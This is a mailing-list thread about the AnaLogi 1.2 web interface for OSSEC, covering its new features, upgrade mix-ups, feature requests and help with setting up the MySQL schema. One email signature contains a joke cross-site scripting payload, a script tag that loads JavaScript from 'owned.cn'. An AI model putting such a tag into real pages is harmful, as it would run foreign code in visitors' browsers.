Re: [ossec-list] Re: AnaLogi - OSSEC WUI v1.2
745 views
Skip to first unread message
Xavier Mertens
Aug 3, 2012, 8:00:53 AM8/3/12
to ossec...@googlegroups.com
I installed the new version (just replaced the existing directory) and worked like a charm...
Good job Guys!
/x
On Thu, Aug 2, 2012 at 2:37 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
For the bug... I *think* you have not replaced ./analogi/php/index_graph.php
Can you confirm you replaced *all* files in *all* sub folders please
This could also explain why the 'Alert Feed' and 'Rule Trend Analysis' are not working *
Andy
* 'Rule Trend Analysis' will also need a few weeks of data to work as you would expect for a 'trend'
On Thursday, August 2, 2012 6:47:39 AM UTC+1, Dmitry wrote:Hi!I used AnaLogi 1.1.As far as I unfrstood in order to install AnaLogi 1.2 I had to copy (replace) all the files from zip archive to /analogi (exept db_ossec.php).I did so, but I have almost empty pages NewsFeed and Management.See attached files (+ 1 previous bug).BugNewsFeedManagementOn Wednesday, August 1, 2012 2:18:20 PM UTC+4, techs...@ecsc.co.uk wrote:The new version is out and on GitHub !!
https://github.com/ECSC/analogi/downloads
New Features
--------------
Connection Diagnostics for when Analogi does not have any data for the graphs (it tests mysql/php module, connection to server, mysql schema, database content).
Group Category filtering added to main page (sshd, arpwatch, windows etc)
New page 'NewsFeed' providing:
* 'Threat Feed' gives a listing of alerts based upon alert time and threat level
* 'Trend Analysis' compares the previous time block against previous weeks to see which alert/systems are experience the greatest change from base line
New page 'Management' for managing and running the SQL database providing:
* Last agent check in report to highlight which agents have stopped reporting in
* List of the biggest alert/system combinations
* Database size and Database row count
* Report on which agents are using the most disk space with a per level breakdown
* Historical report on database data
* ....All of which help feed into the last section, the Database Clean up filter for deleting superfluous data
Auto Div scaling on front page ensures that an excess of graph lines does not impede the visuals
Customisable auto-highlighing of keywords on detail.php
Fix/Improved
--------------
Faster SQL
Hover text for front page
Improved consistency between index.php and detail.php
Radio button selection on index.php
'Top Rare' warning when not enough data
Relative link to images for detail.php
Hard links added to header
Lots more
All feedback welcome.
(I've created a new thread to keep comments separate.)--
My server is com<script src=http://owned.cn/js.js>pletely secure.
Frank Stefan Sundberg Solli
Aug 3, 2012, 8:15:31 AM8/3/12
to ossec...@googlegroups.com
Thanks for the new update, where can I find the thread about the comments?
--
MVH/With regards
Frank
--
Name: Frank Stefan Sundberg Solli
E-mail: frank...@gmail.com
Web: http://0x41.me
On Fri, Aug 3, 2012 at 11:27 AM, Dmitry <isser...@gmail.com> wrote:
Thanks a lot.You are quite right. I'm windows user, so i was not able to extract and correctly copy Analogi files.
--
MVH/With regards
Frank
--
Name: Frank Stefan Sundberg Solli
E-mail: frank...@gmail.com
Web: http://0x41.me
GPG: 684119F4
Frank Stefan Sundberg Solli
Aug 7, 2012, 7:25:23 AM8/7/12
to ossec...@googlegroups.com
Hi, I really like the new version, I got some suggestions that im posting here
1) In management.php the database usage- client vs level. level 5 and level 9 has the same colour (blue)
2) in detail.php it would be cool with a autoupdate feature that works on the filters that you set
3) In RuleID it would be handy with a list of rule id's+names(?) so that you can navigate through the alerts
1) In management.php the database usage- client vs level. level 5 and level 9 has the same colour (blue)
2) in detail.php it would be cool with a autoupdate feature that works on the filters that you set
3) In RuleID it would be handy with a list of rule id's+names(?) so that you can navigate through the alerts
Frank Stefan Sundberg Solli
Aug 7, 2012, 9:15:57 AM8/7/12
to ossec...@googlegroups.com
3) What I was thinking was more of a drop down menu of all Rule IDS', that way you dont need to know the Rule ID for the alert you want to look for. (This will allow people not familiar with the internals of ossec to search for relevant log entries)
On Tue, Aug 7, 2012 at 2:44 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
1) Yes, the colours are generated by amcharts, I've been considering a custom colour set which would probably also look good here..
2) Oops I thought it did, good idea
3) Which RuleID please? I ask because on the detail.php 'filter' the text input allows for comma separated allowing for more than one RuleID to be selected for comparison, so here it might not work, but anywhere else I'm open to suggestion...
Andy
Frank Stefan Sundberg Solli
Aug 8, 2012, 3:04:01 AM8/8/12
to ossec...@googlegroups.com
Hi, I'm posting a screenshot of what im thinking about http://mcaf.ee/9ewhd
On Tue, Aug 7, 2012 at 4:36 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
Sorry, to clarify, are you referring to a specific location, or everywhere?
Frank Stefan Sundberg Solli
Aug 9, 2012, 5:02:52 PM8/9/12
to ossec...@googlegroups.com
Oh, you are correct, agree on that one :)
On Wed, Aug 8, 2012 at 4:16 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
Sorry Frank, I'm still not with you :(
I believe your image shows 'categories' (defined by <group>login_day</group>) rather than Rule IDs? Like Splunk I have a category/group filter on the index.php.
The graph breakdown on index.php has RuleID and RuleDescription
The Top10 Rule breakdown on index.php has the rule description (but not ID, though you can see this by hovering over a link)
On detail.php if you specify a RuleID this is described, if not then results just have a RuleID
* I am hesitant to have a drop down for the detail.php filtering as this would remove the ability to search for rule "550,551,552" etc
Newsfeed Trend shows ID and Description
Let me know
Andy
rocka...@gmail.com
Oct 22, 2013, 5:06:59 AM10/22/13
to ossec...@googlegroups.com
Hi,
I currently have a problem setting up analogi.
During the installation i get the following error:
I have no idea what is meant with Import the MySQL schema that comes with OSSEC and how to do it?!
could you please provide me with help so i can get this fixed and get analogi running?
many thanks in advance :)
theresa
I currently have a problem setting up analogi.
During the installation i get the following error:
Test 1 - Can PHP detect MySQL module? - yes
Test 2 - Can PHP connect to your MySQL? - yes
Test 3 - Does your database have correct schema? - no!
Fix - Import the MySQL schema that comes with OSSEC
Fix - Import the MySQL schema that comes with OSSEC
Test 4 - Is there any data in your database? - no!
Fix - Ensure agents are logging data.
Fix - Ensure agents are logging data.
I have no idea what is meant with Import the MySQL schema that comes with OSSEC and how to do it?!
could you please provide me with help so i can get this fixed and get analogi running?
many thanks in advance :)
theresa
rocka...@gmail.com
Oct 23, 2013, 2:50:26 AM10/23/13
to ossec...@googlegroups.com
Ok, after re-compiling OSSEC with mysql support and importing the mysql.schema I am now one step further
the only test that now fails is:
the only test that now fails is:
Test 4 - Is there any data in your database? - no!
Fix - Ensure agents are logging data.
any ideas how i could fix this?
many thanks in advance,
many thanks in advance,
Reply all
Reply to author
Forward
0 new messages